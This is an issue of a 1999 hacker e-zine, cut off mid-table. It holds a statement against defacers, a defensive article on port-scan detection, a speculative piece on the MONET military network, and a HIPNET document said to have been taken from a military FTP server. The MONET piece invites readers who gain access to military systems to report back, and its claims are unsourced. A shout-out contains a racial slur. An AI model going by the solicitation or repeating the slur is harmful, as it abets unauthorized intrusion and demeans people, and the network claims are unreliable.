/* Keen Veracity...................................Volume 3, Issue 8 */ e e eeee eeee eeeee ee e eeee eeeee eeeee eeeee e eeeee e .e 8 8 8 8 8 8 88 8 8 8 8 8 8 8 8 8 8 8 8 8eee8e 8eee 8eee 8e 8 88 e8 8eee 8eee8e 8eee8 8e 8e 8e 8eeee8 88 8 88 88 88 8 8 8 88 88 8 88 8 88 88 88 88 88 8 88ee 88ee 88 8 8ee8 88ee 88 8 88 8 88ee8 88 88 88 88 Keen Veracity Technical Journal July 21st, 1999 88 88eeeeeeeeeeee. . Legions of the Underground . .eeeeeeeee88 [most of the editing done by headflux] .-[ Keen Veracity, Volume 3, Issue 8 ] | |__Introduction | |_ kv[1]; General Information..................................staff | |_ kv[2]; Statement........................................optiklenz | |__Computer Security | |_ kv[3]; Port Scan Detection..............................t0ucht0ne | |_ kv[4]; Introduction to MoNet...............................uplink | |_ kv[5]; Article on HIPNET..................................zipcode | |_ kv[6]; Intrusion Detection Systems......................ProtocolD | |_ kv[7]; Another IE Exploit?.................................ntwak0 | | | |__Programs/Source Code | | |_ kv[8]; tryseg.c.........................................guidob | | |_ kv[9]; match.c...........................................icesk | | |_ kv[10]; netsniff.c (reprint)...........................mnemonic | | |_ kv[11]; liberty.c........................................guidob | | | |__Miscellaneous | |_ kv[12]; Ode to JP....................................krankshaft | |_ kv[13]; Top WWW Sites...................................ntwak0 | |__Telephony/Radio | |_ kv[14]; Intro to Loops.....................................hitman | | |_ kv[i]; outro kv[1]; /* General Information..................................staff */ SYSCON IS BACK AND IN EFFECT: http://www.legions.org/syscon for info [posse]: ``````` cap'n'crunch optiklenz uuuuuu uuuu aphex guidob uuuuu uuu [havoc] touchtone chiXy uuuuu uuu lothos slfdstrct ntwak0 uuuuu uuu headflux ProtocolD uuuuu uuu kingbong touchtone uuuuu uuu Kanuchsa uuuuu uuu Digital Ebola uuuuuuuuuuuuu duncan silver uuuuuuuuuu uuu [lou] www.legions.org efnet - #legions come hang with grouppiez, and other cracked out porno stars - legions ircd still being tweak'd [shoutouts]: no one in particular ``````````` [copyLeft]: whatever... ``````````` Download Pictures of Legions at Defcon7 from the following sites: =============================================================== ***| http://defcon.legions.org ***| http://www.legions.org/defcon7/index.html ef-te-pee ================ ***| ftp://www.underzine.com/rootfest/defcon/defcon7.html ---------------------------------------- call the authorities optik's drunk again ---------------------------------------- gimme shouts next issue for being a p1mp. sure word. joe gotta hand cuff yur hoes doh nice zine, btw. so they dont be mewvin when i try to humpzorize em thnks articles with real substance. makes b4b0 look like dr. seuss. ------------------------------------------------------------- it's just a matter of taste... Some people obviously have it. ------------------------------------------------------------- kv[2]; /* Statement........................................optiklenz */ Something needs to be said... First off... Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions requ esting information on what the true plight was. Because of some iniquitous media converage a few people misunde rstood our motives. This of course is in regards to the past "China Human Rights incident". We wanted to bring a tragic predicament to surface so other people could speak out as well. The media was mis informed when they reported about our goals to aid these countries in their fight or freedom of speech. They (th e media) stated we (Legions) wanted to damge certain com puter networks in other parts of the world. We wanted to help them with the situation concerning their lack of fr eedom, and human rights why would we want to destroy or damage their networks the same networks that give them what little freedom they have to communicate as people. That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things, and clear up misunderstandings. It's not a funny matter when peoples lives, and reputations are at stake. As hackers the computer has built our lives, and in turn we have built our lives around the computer we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billionaire. Software designers, security specialist the people who help protect your networks these people are hackers. " Information, and data is to be cherished, (for it can only build you not hurt you) cultivated and developed not to be annulled or locked up. Hacking is an expansive applied knowledge in any technical field. Destruction, and the unschooled acts of those who live with out moral are what separates the "hackers"(those who's main purpose of life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on."( -The previous quoted statement was excerpted from Keen Veracity 3 www.underzine.com). Something serious is going on at the moment. A string of "attacks" against our own government. And till now no one has said anything. The actions of these groups are sincerely half-witted, and absurd for it will at the end accomplish nothing except a few more long term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated. The people DOS'ing government sites, and defacing mil, and gov domains, and damaging information these people aren't hackers they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endangerment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking" because it's not. So many articles have surfaced which referred to what these cracker cults are doing as "hacking" ex; "Hackers attack government" - "Hackers strike again" (false) Call them destructive call them by their first name but for the sake of god don't just yank out the term "hackers" for a better story for the sake of god don't defile the name "hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't. A government investigation is currently pending on the above matters If we dont do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we dont stop these people from making us look bad. Though we are not affliated with them directly certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be a stake here. With that said I ask that all sites that archive these senseless hacks suspend documenting these fatuous acts for the time being. The script kiddies that go out and target government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public. A note to the lamers This is where it ENDS... In the end it's what you choose to do that makes you who you are. So make sure what you choose to do doesn't make you look like an ass. http://www.hackernews.com/archive/1999/noaa/index.html http://www.hackernews.com/archive/1999/army/index.html http://www.hackernews.com/archive/1999/monmouth/index.html http://www.hackernews.com/archive/1999/argonne/index.html http://www.hackernews.com/archive/1999/nswcl/index.html http://www.hackernews.com/archive/1999/senate2/index.html http://www.hackernews.com/archive/1999/bnl/index.html http://www.hackernews.com/archive/1999/doi/index.html The above is an archive of recent government, and military site defacements done by what seems to be comparable to the works of 5year olds... Look at the archived sites, and tell me something doesn't need to be done. Just letting people know we aren't going for their childish actions. We dont advocate any of the trash being done by these uninspired idiots. we're "hackers" the other white meat! ------------------001---------------------------------------------- the below is an email, and responce excerpted from Keen Veracity 4 ------------------------------------------------------------------- [mail] Do you still hack? [responce] Well it depends on your analogue of hacking. By the authentic formalization I "hack" everyday. Whether I'm coding, or doing Network checks it's still hacking. Hacking has little to do with the "illegal" entry of computer systems apart from the Technical, and systematic aspect of it. Illegally accessing a system for no intended reason is not something I advocate or advise performing. What I suggest achieving is going out, and learning, and questioning the system itself before trying to exploit it. And even once you feel you have a broad knowledge of the system make sure you use what you know to build things, and not fuck things up. System admins who are affected by crackers turn to hackers in order to secure their systems. They turn to the philosophies, documents, and programs written by "hackers"... Let's not make them look the other way. We are here, and we are skilled. What your brain dead system administrator can do in a week we can accomplish in a matter of minutes more practically. That's the message that should be put across. One of positively not one that says "Were going to take you down." Read my introduction in Keen Veracity 3 I go into greater detail on the subject at hand. http://www.t00ned.org/optik/kv/kv3.txt -Steve Stakton Steve Stakton - -(optiklenz) -Head Security Advisor for NACC Legions Of the Underground - Our title name is not meant to seem dark. Don't get the misconception that we are some sort of cult or only wear black. The computer Underground is a symbol something that is important, and we treasure it's existence so in it's honor we use the name Legions Of the Underground. We are just a bunch of computer enthusiast who enjoy working together. Nothing more nothing less. -----BEGIN PGP PUBLIC KEY BLOCK----- mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe 0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1 PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ 2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG 0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N 286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/ RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+ SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE 1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p /P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0 3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg== =cpan -----END PGP PUBLIC KEY BLOCK----- kv[3]; /* Port Scan Detection..............................t0ucht0ne */ Port scanning, Everyone does it. Whether it's an administrator trying to find out what is being spoke on a remote node, or a 15 year old script kid looking for exploitable boxes, port scanning is the first step in identifying services on a networked machine. I've always been bewildered when I've had conversations with network security experts and semi-aware administrators who explain to me that they've invested a lot of money and resources into the latest firewall technologies and intrusion detection software, yet never even considered port scan detection tripwires. Being aware of port scans can alert any competent sysadmin of potential compromise long before it's too late. With the wealth of software out there dedicated to finding everything from open NetBIOS shares to web server exploitation, port scan detection software becomes more important then ever. Furthermore, it's safe to say that making your boxes layer 3 aware is a good idea. Even a wayward ICMP Echo can be the first sign of a lurking intruder. In this whitepaper, I'd like to talk about several packages that encompass making your network "probe" aware. I will talk about the pros and cons of automated defenses employed by these packages, plus give a general overview of why itÕs a good idea to also be layer 3 aware. The first important thing to recognize is that port-scanning software has made some significant advances in the last year or so. They have become stealthier, faster, and smarter. For example, two years ago, most people were using Strobe written by Julian Assange (ftp://suburbia.net:/pub/strobe.tgz). It was quick and dirty (possibly still the fastest port scanning software to date), and would spit out the services spoken at the other end. Now, most people are using NMAP, written by Fydor (http://www.insecure.org/nmap), which not only does port scan detection, but will also do TCP fingerprinting, compare the fingerprint to it's database, and guess what O/S is at the other end. It's capable of a myriad of different scans, including a stealth scan that can beat a lot of port scan detection software. So, with one little piece of software, a potential cracker can identify the services being spoken on your networked host, what operating system is being run, and do it undetected. Scared? You should be. In many aspects, it's pointless to remove operating system specific banners from your daemons because software like NMAP and Queso do a great job of identifying the O/S through TCP fingerprinting. Unfortunately, a lot of admins and network engineers aren't even familiar with these programs, but those that are, realize how important it is be atleast semi-aware of when these tools are being used against them. "So, T0uchT0ne, what can we do about this?" I hear you asking. I'm glad you asked, because we now are going to discuss several options that are available. My personal favorite is Abacus Sentry (http://www.psionic.com/tools/portsentry-0.90.tar.gz). It's a piece of software written by Craig Rowland as part of the Abacus Security Project. Sentry has the ability to detect port scans, and implement automated defenses. These defenses can encompass everything from entering the offending machine into your routing table (routing the host into oblivion) to adding the attacker to the hosts.deny file. Even more exciting, is the ability to add custom commands to the Sentry configuration file that would allow you to be paged or emailed in the event of a port scan trigger. To understand what happens with port scan detection software, we need to cover some basic concepts with how a TCP connection is established. Host A sends a TCP segment to Host B with the syn bit set to 1, and the ack bit set to 0. This makes sense, since the first step in a connection is to syn"chronize" Host A and Host B. Host B then responds with a TCP segment (notice that I'm not using the term packet, because to TCP, there is no such thing a packet, don't make this mistake.) that has the syn bit set to 1 and the ack bit set to 1. After the initial handshake, both hosts sends the TCP stream with the syn and ack bits set to 1 right up until the teardown of the connection. This is a very simple explanation, Suffice to say, I've not gone into explanation of how sequencing works, etc., because this is not a whitepaper on TCP, but on port scan detection. Most port scanners work on this simple principle, of opening TCP connections to a host, and seeing what answers on the other side. The secret to port scan detection is making sure you have something that is listening on ports that don't normally have daemons installed. Since we know FTP is usually on port 21, and there is already an FTP daemon installed on port 21, we canÕt bind a sentry device on it, since no two daemons can monitor the same ports. Fortunately, the good news is, the implementation of port scan detection is incurred through the basic understanding that most intruders are scanning a range of ports from 1 - 1024 (and higher) in a sequential manner. Since we can't bind to 21, let's bind to 22, 23, 24, 25, etc. (excluding ports with listening daemons). If a connection is made to port 22, and we don't have a service on port 22 (which we do, but it's our sentry software) then we know there is a good chance that a port scan is being run. Of course, you don't want to trigger your defenses based on one un-used port. That is why Abacus Sentry allows you to set the "trigger". For example, on my hosts, I usually set a trigger of 2, so that it takes 3 consecutive ports with no services on them to be hit before you get entered into my hosts.deny file or routed to nowhere. I hear you calling foul. Yes, but I could spoof my source address to be your upstream router, and the next thing you know, your machine is cut off from The Internet. True. You could. This is one of the downsides of port scan detection software. It can be used against you to deny your service. This shouldn't stop you from using it. Here is why. First off, with Sentry, there is a file called "hosts.ignore" that allows you to configure the detection software to never take action on specific hosts. I've gotten into the habit of tracerouting out of my network to different hosts, and recording which routers within the upstream I usually go through. I enter these routers IP addresses into my hosts.ignore file. This isn't foolproof, but for the most part, does a lot more good then bad. For the record, in the 2 years I've used Abacus Sentry on a myriad of different networks, I've never been the victim of a DoS attack where Sentry was used against me. My opinion is that (and this is also the opinion of the author of Abacus Sentry) is the benefits of using port scan detection software far outweighs the cons. I also believe in using JAIL (Just Another IP Logger), which you can find at www.genocide2600.com/~tattooman using their search engine. Logging ICMP traffic is the mark of a good security admin. Sure, you don't need to log all ICMP traffic, but logging echoes and destination unreachables is a sure way of catching the first steps in an attack. Granted, most echoes and other ICMP traffic is legit, but when you see a ping from some host in Germany, and you know you don't have any customers or users in Germany, something could be up. Configuring your syslog daemon properly, and logging all your scan detection software to one file can allow you to write some pretty snazzy perl scripts to boot. I'll leave this to your imagination. If you have any questions, or want to offer me some good advice on past experiences you've had with detection software, email me at root@t0ucht0ne.ca. I'd love to hear from you. Shout Outs: All of Legions of the Underground and #legions, Drown, Mopar, most of #hacking, Stratus (where ever you are), Kweiheri (you will be owned by Kwei), NodeRaTz, and The White Niger (pronounced Ni-Jer). * T0uchT0ne # [-------------------------------------] kv[4]; /* Introduction to MoNet...............................uplink */ 01001101 01101111 01001110 01000101 01010100 .-.-.-. .----. .-..-. .---. .---. | | | | | || | | .` | | |- `| |' `-'-'-' `----' `-'`-' `---' `-' Information compiled and written by lowtek aka uplink of Legions Of the Underground http://www.legions.org 01001101 01101111 01001110 01000101 01010100 Introduction MOnet (Multi-wavelength Optical Networking Technology) is about the most advanced network that is in progress at the moment besides SOnet. It combines all of the government/military applications. MOnet is connected to many military domains. Many bell RBOC's and Private Telcom Companys are working on the project together such as: AT&T Bell Atlantic BellCore Bellsouth Lucent Technologies Pacific Telesis SBC/TRI NSA DARPA MOnet is being put into progress in WASHINTON D.C. and is a 100 million dollar project from good old .mil (dont you just love where your tax's are going?) it is funded by ARPA (advanced research projects agency) Monet is basically SOnet but it has been improved. The way it was improved is that it signals data through wave lengths of light. This way of transporting data is very fast and very effieciant. The MOnet in Washington is interconnecting Bell Atlantics Silver Spring Labratory also the Naval Research Labratory, and the National Security Agency. This network is being expanded all the time to group together other such government groupings. The New Jersey MOnet at the moment is interconnecting The Red Bank of New Jersey and is currently been tested at the speed of 2.5 G/bits transmission. Impact Assessing Multi-wavelength Optical Networking (MONET) for commercial viability and Government applications Balanced approach with focus on economics & architectures, enabling technology, and networking testbeds Demonstrating networking through experimental interconnected networking testbeds (in NJ and DC) Strong team representing equipment manufacturers, management software developers, and network operators Technology transfer through commercialization by partners This shows MOnet's actual gates and connections: NSA | DARPA | | | | | | | | ----------------------------- |NASA | | | | --------| | | DISA----------------| |------| --------| MOnet |------------------GateWay | | |------| | | | | | | | | | |___________________________| | | | |DIA DISA | | | | NRL This shows MOnet at its last stage complete which includes DIA, NRL, DISA, NASA, and DARPA. These are all very important military operating groups that provide the power of MOnet. And whats this GateWay? huh? ohh so there is an actual way into the system. yes there is but to get into MOnet is to be able to pretty much hack anything. This system does not only use high DES encryption but also uses hardware encryption (just like SIPERNET). These gateways supposedly can be accessed through dial-ups in Washington D.C. and New Jersey also through a domain that is hosted by MOnet. c0mputer |------| Logging on via | | -----> ------> dial-up connection | |-----------------|the /----------------|------| | Internet / This represents a | \|/ computer logging on via | | the internet and via dial-up | \|/ | \\//----------------------------| | | \\// | | |-----GateWay Through the | | | Internet Modem Pool | | | | | | |--------------| | | |============================================| |Dial-up connections and internet connections| | Bundle together and transfer straight into | |--| MOnet | | |____________________________________________| | | | | | |____________________________________ | | | *------------------> | | | MOnet | | | |____________________________________| This is a security threat that it can be accessed over the web because if you do this you may enter MOnet without having to deal with the encryption. Now only some .mil domains and only some .gov also. If you reach these or get access any other way please e-mail me so I can update this text at lowtek@uswestmail.net MOnet will continue to grow within the United States and start to progress to other buisness's. This network is still in its starting stage but is finally becoming up to date a bit. I could not find any other info on this subject (considering the fact that they want to keep it secret). [-------------------------------------] kv[5]; /* HIPNET........................................... .zipc0de */ I found this file on a military ftp server, which I thought was very interesting so I saved it along with other documents, as it turns out it's on the HIPNET, which is a military network used by our government. If you have some more information on the HIPNET please e-mail me at zipc0de@hotmail.com and I'll include it in my further text files on military/government networks. As for now enjoy the file and don't get into trouble :] HIPNET User Requirements Revision 4.0 1. Introduction The High Performance Network (HIPNET) seeks to develop a reliable multicast transport protocol and IP QoS mechanisms which satisfy requirements of US Navy and French MOD applications. The applications are multimedia in nature and include: bulk file transfer, image transfer, audio/video, email/messaging, interactive planning missions (whiteboarding) and simulations, realtime data transfer, teleconferencing and others. The requirements that these applications impose on the transport protocol and the IP QoS facilities are examined in this paper. The general requirement is a reliable multicast service, yet, there are many variations of this service. There are two highly variable aspects to a reliable multicast service: reliability which spans a spectrum from best effort to absolute and, ordering, which might mean anything from simple source delivery to causal, total ordering. Several existing protocols provide reliable multicast service, yet none has achieved the status of open standardization acceptance. One overriding requirement of the US Navy user community is the requirement that the reliable multicast service be provided by a protocol that is accepted as an open standard, much as TCP and IP are in today's Internet. This paper is a culmination of a three-stage process. The first is to define a chart of communication characteristics that can be used to distinguish applications relative to their requirements (section 3). The second is to define a list of generic applications that encompass the totality of all envisioned applications and then to apply the characteristics chart to each of them (section 4). 2. The Operational Environment: Communication Channels Consideration must be given to the characteristics of the communication channel over which the data will be transmitted. The communication channel characteristics for the US Navy and French MOD vary widely, depending on the operational environment, and range from low data rate, simplex channels to high capacity, ATM channels. Part of the channel characteristics could include asymetrical networks where the data channel transfer rate between sender and receiver is different than the rate between receiver andsender. This would provide a communication environment that is vastly different than the normal communication channel characteristics which could include Ethernet, FDDI or ATM. Therefore, each application must be able to specify those critical characteristics that the communication channel must support in order for the application to be able to meet the mission requirements. The project, however, must focus on a subset of this entire range in order to live within budget and time constraints, therefore, the operational environment identified for HIPNET is ATM and IP over ATM. 3. Communication Characteristics The user applications can only meet its mission requirements if the underlying communication architecture provides the mechanisms to either define or control a specific characteristic that is needed to meet the specific requirements of the user application. Some of these mechanisms could be located within the user application itself, the underlying transport service or as part of the network interface. There are tradeoffs in determining the optimum location for each of these mechanisms since each location may have significant performance or user compatibility requirements. Specific characteristics are outlined in the following paragraphs. As part of the user applications requirements, the user may wish to send data to either one receiver or multiple receivers. Depending upon how this mechanism is implemented, this could be accomplished using one protocol architecture that provides both capabilities or two separate protocol architectures. 3.1 Group Management The key issue in group management is: does the application need to identify the receiver group, i.e. have group knowledge? The knowledge could be total, partial or none. If the knowledge is total, then the group is said to be known. If the knowledge is partial, then the group is said to be partly-known. If no knowledge of the group is required, the group is unknown. Multicast groups could consist of fixed or dynamic memberships. The management of the groups could take place external to the transport protocol and in some cases be manually performed. Any protocol running over IPv6 has the IGMP (Internet Group Management Protocol) available that provides network level functions for joining/leaving/routing of groups. IGMP is sufficient in many cases, but, if the application needs any control over the membership, or monitoring of the membership, such capability must be performed above IGMP. The size of the multicast group, the method of either joining or leaving the group, and the responsibility for maintaining the configuration of the group are characteristics that could be different between specific user applications that would still use a common reliable multicast protocol. An additional requirement could include the ability to support multicast receivers who may temporary leave the multicast group but want to maintain current with data that was transmitted while they were not part of the multicast group. Applications define a group managment policy that may allow dynamic joins; may limit admission to a multicast association to a subset of the participating nodes or may not allow any nodes outside of a fixed membership to join. The join/leave policy is also affected by the reliability constraints, for example, an application may require atomicity: the ability to deliver within a specified interval once it's deliver to one of the group, to all members of the group. Since the policy of group membership is so application dependent, it makes sense to not implement group policy in the protocol stack, however, this does not relieve the protocol stack of responsibility to provide necessary group management funcitonality for application use. An event like a node joining or leaving a multicast group may or may not require notification depending on the reliability constraints and security policies. The notification may be required by a central controlling node ( a server or master side) or it may be required by the rest of the group. The policy will be established by the application, however, the tranport layer may be required to have mechanisms necessary to effect such events. 3.2 Topology Applications differ in their requirements for data flow direction. Some applications (e.g. broadcast TV) involve a single transmitter and a group of receivers. This arrangement is referred to as point-to-multipoint (PT->MP) communications. Another arrangement is to allow the receivers to transmit back to the sender (MP->PT) (sometimes referred to as concast), but not to each other. Yet another is the topological configuration in video teleconference which is multipoint-to-multipoint (MP<-->MP). 3.3 Scalability Scalability makes the mechanisms necessary to implement a reliable multicast and an IP QoS an issue. Multicast's most basic benefit (that the number of transmissions is reduced from the unicast case) may be negated if acknowledgements are required from all receivers. There are schemes for minimizing the amount of control packets from receivers to transmitters and for limiting the number of retransmissions, however, the basic dilemma remains. One scheme is to have the receivers send a negative acknowledgement (an explicit request for retransmission) instead of positively acknowledging each packet, however, the NAK algorithm may also degrade under implosion given a sufficiently large receiver set. There are schemes for limiting NAKs as well as ACKs, and often hybrids are proposed. A tree strucutured set of proxy receivers where the proxies assume responsibility for reliable delivery is one such scheme. Some applications negate the scalability issue if the number of participants is guaranteed to be small. An example would be email multicast on an organizational basis where the number of organizational units is small (say less than 15). Another example is a video conference in an N X N configuration (all participants are both sender and receiver), and might not consist of more than 15 people. On the other hand, applications that execute in small-scale groups today may need to accommodate large groups tomorrow because of the explosive growth of the Internet and its associated applications and unforeseen uses of those applications. Put another way: it's difficult to predict future uses of technology based on past experiences. The Internet itself, for example, was created primarily to service file transfers and remote logins. Only after the technology was created and utilized, did researchers realize that its main use would be for the exchange of email (and, subsequently, access to the World Wide Web). 3.4 Data Ordering: The delivery of data from the multicast sender to the multicast receiver may require that the delivery service support a range of ordering including none, source, causal, or total ordering. Source is an ordering that a unicast transport protocol like TCP would provide by delivering messages between a pair of participating endpoints in the order that they were transmitted. Causal is an order that guarantees that all messages that are related are ordered, such that, a receiver would not receive a particular message if all related messages had not previously been delivered. Total order means that multiple streams from multiple senders are delivered to each receiver in the same relative order. There are often requirements in distributed processing for variations on these ordering properties for the purpose of attaining consistency, fault tolerance, and stability. The support of total or causal ordering typically requires the transport protocol to provide a timestamp of some sort. 3.5 Reliability Range: As stated earlier, the user application may require a range from an absolute guarantee that all receivers have received the data to the best effort reliability provided by the transmission characteristics of the communication channel. Absolute reliability requires acknowledgements for all data packets transmitted and implies total knowledge of the receiver set. There are partial reliability requirements imposed by some applications such as a k-reliability mode wherein data transmission is successful if k receivers acknowledge the message, Some applications may impose the requirement that a majority of receivers acknowledging receipt is sufficient. Another aspect of reliability is that of atomicity: if the message is delivered to any in the receiver set then it must be delivered to all members of the set. This could be the case, for example, in a distributed database application where consistency is an important requirement. Data may require a reliability mode of most-recent (or freshness) that requires reliability but only within a latency bound (a lifetime is associated with the data). The method of assuring reliability must be balanced against other requirements placed by the user on the communication channel. This may become a negotiated function between the user application and the underlying communication channel. In addition, the definition of reliability may have to be established by either the user application as a multicast sender or the user application as a multicast receiver. 3.6 Quality of Service (QoS): A QoS capability might make use of a resource reservation mechanism which permeates the communication protocol layers such that a certain level of performance is guaranteed. QoS parameters include latency, throughput, jitter, precedence, reliability and capacity. Applications that don't require QoS are satisfied with only best effort delivery services. The characteristics required by the user application of the communication channel may be defined as individual items or they could make up a single QOS requirement that is passed from the user application to the underlying communication channel architecture. A standard format may be required so that each user application is not required to develop their format for defining specific characteristics for the communication channel. 3.6.1 Communication Channel Throughput: The user application may require that the communication channel support a required transmission rate, or throughput, from a sender to either a single or multiple receivers. The throughput rate might be expressed as a burst rate and/or a sustained rate. The rate reflects the applications ability to inject traffic into the network. The acceptable rate might vary depending on the available resources, for example, a video conference over a T1 circuit might specify its requirement as a 128 Kbps service; whereas, the same conference over an ATM circuit might require 1 Mbps service. This reflects the fact that the user's perception of a required QoS might change relative to his knowledge of the resources available. The ability of the communication channel to support a specific transmission rate may require negotiation between the user application and the underlying communication channel. 3.6.2 Communication Channel Latency: The user application may require that data transmitted by the sender must be received by either a single receiver or multiple receivers within a specific delay. The latency could be expressed on a per-session or per-message basis. The application can indicate the minimum delay that will be noticable to the application. This provides information to the negotiation process that can then determine when to cease the negotiation for the requested latency. The distance from sender to receiver will strongly influence achievable delay, thus, the application may need to negotiate the delay parameter depending on the communication path available. 3.6.3 Communication Channel Jitter: Jitter is the variation in the end-to-end delay caused principally by media access delays and queueing delays. Jitter can be compensated for by adding a variable delay at the receiver. Jitter is a concern for streams (like audio and video) that require synchronization. Jitter is also an indication of the amount of congestion in the net and may provide important feedback to the QoS mechanisms.. 3.6.4 Precedence/Priority Applications often need to expedite delivery of certain messages. This could be on a per-session basis or on a per-message basis. Some applications need to define the importance of their data according to a system-wide scheme. If the network media supports priorities and the operating system is capable of real-time performance, end-to-end delays can be bound. 3.6.5 Reliability Foreward error correction (FEC) techniques are used to guard against errors by including with the data transmissions redundant data bits which can be used by the receiver to detect, and, in some cases, correct, certain bit errors. FEC provides reliability at the expense of channel bandwidth and transit delay, but is helpful when applications cannot tolerate retransmissions. The error characteristics of the communication channel determines the degree of redundancy required. Noisier channels require more redundancy. The QoS parameter of reliability, therefore, is communication communication channel dependent. 3.6.6 Capacity The QoS throughput parameter dictates a certain network level capacity. For example, a video conference might specify a throughput requirement of 1 Mbps. The network QoS mechanism would need to choose a capacity range above 1 Mbps. The communication environment, however, might limit the application to a certain capacity, therefore, this parameter is also communication channel dependent. 4.0 Applications: There are many different user applications that could be specified as using data transmission protocols. They have been developed to meet different mission requirements however, as an combined group, they could have common or different requirements for the communication channel based on the need of a specific mission requirement. Rather than look at the requirements for the user application as defined in a specific mission, the user applications data transmission requirements can be generalized in terms of the type of data to be transferred. These data types are: a. Text Message/Email b. File/Image Data Exchange c. Voice/Video Conference d. Voice/Video Broadcast e. Interactive Multi-Media f. Time-sensitive Data Exchange g. Time-critical Data Exchange h. Replicated Data Base It is helpful to map military applications in each of these classes to commercial applications: Generic Application Commerical Applications Military Applications Text Messaging/Email Email, News, WWW DMS,JMCIS,GCCS,APS File/Image Weather maps (imm) JMCIS,GCCS,DMS Conference vic,vat,wb VTIXS Broadcast public radio,freeway traffic JDISS, JMCIS Interactive Mulitmedia vic,vat,wb GCCS Time-sensitive virtual games,stock quotes JMCIS Time-critical air traffic control,stock quotes combat systems Realtime DB distributed process, stock quotes JMCIS In the sections that follow, each application is evaluated according to the characteristics chart developed previously. It is not possible for the project to address each of these applications or application classes. The project's focus will be limited to non-realtime applications like bulk file transfer. 4.1 Text messaging/Email 4.1.1 Application Use Applications in this category include official organizational messages, email, message paging, facsimile, bulletin board, and newsgroups. X.400 email is the prototypical application in this category and is characterized by traffic that is not sensitive to throughput or delay, but is sensitive to errors, i.e. it needs reliable transfer. The reliability, however, may be provided immediately or delayed due to the inability of the receiver to acknowledge in circumstances where the return channel is disabled or unavailable. For this reason an unreliable multicast must be provided in addition to a reliable multicast capability. In fact, a hybrid is needed such that when a message is multicast to a group some members of the group can be expected to acknowledge immediately and others may have to provide for their own reliability by enlisting the services of a logging agent or other means. Email could be sent between individuals or from an individual to a group or organization. Messages of varying priority require a range of guaranteed delivery speeds. This range, reflected in the accompanying chart, is typically from a couple of seconds to hours. 4.1.2 Communication Requirements Characteristic: Range of Values: -------------------------------------------------------------------------- Group Management Known Topology PT->MP Scalability 100 Ordering Source Reliability Range Absolute QoS Throughput 3 Mbps Latency per-message: 2 secs. to hours Jitter no requirement Precedence/Priority Per-message Reliability communication channel dependent Capacity communication channel dependent 4.2. Text and Image File Transfer 4.2.1 Application Use Applications in this category include image/file archive/retrieval, the distribution of weather maps, distribution of key management and other databases. (Also, web cache preload, software dissemination, network news, pre-loading of a database for DIS or games). A typical application is non-realtime bulk data transfer such as the retrieval of an image from an archive. These applications fit a client/server in that the receiver can be the client of a server...the transmitter. The data flow in these applications is unidirectional. No hierarchiacal distribution system is needed. Characteristics not (particularly) delay sensitive but error sensitive. File sizes are great. In some cases, files must be dealt with as monolithic. Transfers on the order of tens of seconds are tolerated. Image files require very low error rates. Compression is necessary. Since there is no interaction, users do not perceive round-trip delays or excessive latencies. 4.2.2 Communication Requirements Characteristic: Range of Values: -------------------------------------------------------------------------- Group Management Unknown Topology PT->MP Scalability 1000 Ordering Source 